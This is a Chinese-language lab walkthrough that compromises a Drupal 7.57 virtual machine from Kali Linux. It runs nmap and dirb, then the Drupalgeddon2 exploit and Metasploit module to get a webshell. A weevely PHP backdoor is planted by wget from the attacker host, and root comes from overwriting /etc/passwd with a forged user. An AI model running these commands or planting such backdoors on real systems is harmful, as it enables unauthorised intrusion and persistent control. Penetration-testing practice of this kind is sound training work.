实验主机
靶机:192.168.9.43
kali Linux:192.168.9.16
实验网络:桥接网络
信息收集
查看kali的IP地址
ifconfig
在kali上主机发现
命令:nmap -sP 192.168.9.0/24
搜索到靶机的IP地址为192.168.9.43
我们进行端口扫描
命令:nmap -A -v 192.168.9.43
发现22端口和80端口开着
然后我们在浏览器上访问80端口192.168.9.43
下面进行目录遍历
命令:dirb http://192.168.9.43
发现http://192.168.9.43/drupal/profiles/minimal/目录下的minimal.Info文件里drupal版本号为7.57
然后我们在百度搜索一下,打开第二个链接
接下来我们就需要下载这个脚本并运行拿到网站的WEBshell
下载地址:https://github.com/dreadlocked/Drupalgeddon2
获取目标网站的WEBshell
在kali中下载
git clone https://github.com/dreadlocked/Drupalgeddon2
安装依赖包
gem install highline
运行这个安装包
./drupalgeddon2.rb http://192.168.9.43/drupal/
连接上shell之后,发现权限太小,我们进一步提权
权限维持
创建小马
weevely generate niu ./703.php
下载创建的小马
wget http://192.168.9.16:8080/703.php
连接成功
weevely http://192.168.9.43/drupal/703.php niu
提权
下面我们伪造一个用户,把它添加到靶机的passwd文件
在靶机的etc目录下把passwd文件下载到本机
file_download passwd /root/桌面/passwd
把密码生成md5,我的密码是niu,用户名也是niu
openssl passwd -1 -salt salt niu
然后把生成的md5码
添加在下载的本机的passwd文件最后一行
下面把靶机的passwd替换掉
wget http://192.168.9.16:8080/passwd -O passwd
然后用msf5
进入msf5
msfconsole
search drupal
使用第四个,进入到第四个模块
use exploit/unix/webapp/drupal_drupalgeddon2
修改rhosts:靶机地址
targeturi 修改为/drupal
show options
set rhosts 192.168.9.43
set targeturi /drupal
run
shell
pyhon3 -c 'import pty; pty.spawn("/bin/bash")'
切换用户
su niu
OK 提权成功